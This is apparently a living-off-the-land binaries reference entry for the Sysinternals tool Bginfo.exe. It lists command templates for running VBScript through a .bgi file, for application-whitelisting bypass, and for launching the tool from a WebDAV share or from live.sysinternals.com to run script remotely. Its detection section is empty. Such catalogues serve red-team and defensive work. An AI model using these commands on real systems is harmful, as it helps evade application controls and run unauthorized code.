Bginfo.exe

Background Information Utility included with SysInternals Suite

Paths

  • no default

Commands

Execute

Execute VBscript code that is referenced within the specified .bgi file.

Use case: Local execution of VBScript

Privileges: User

bginfo.exe {PATH:.bgi} /popup /nolicprompt

AWL Bypass

Execute VBscript code that is referenced within the specified .bgi file.

Use case: Local execution of VBScript

Privileges: User

bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute

Execute bginfo.exe from a WebDAV server.

Use case: Remote execution of VBScript

Privileges: User

\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt

AWL Bypass

Execute bginfo.exe from a WebDAV server.

Use case: Remote execution of VBScript

Privileges: User

\\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt

Execute

This style of execution may not longer work due to patch.

Use case: Remote execution of VBScript

Privileges: User

\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt

AWL Bypass

This style of execution may not longer work due to patch.

Use case: Remote execution of VBScript

Privileges: User

\\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt

Detection

Resources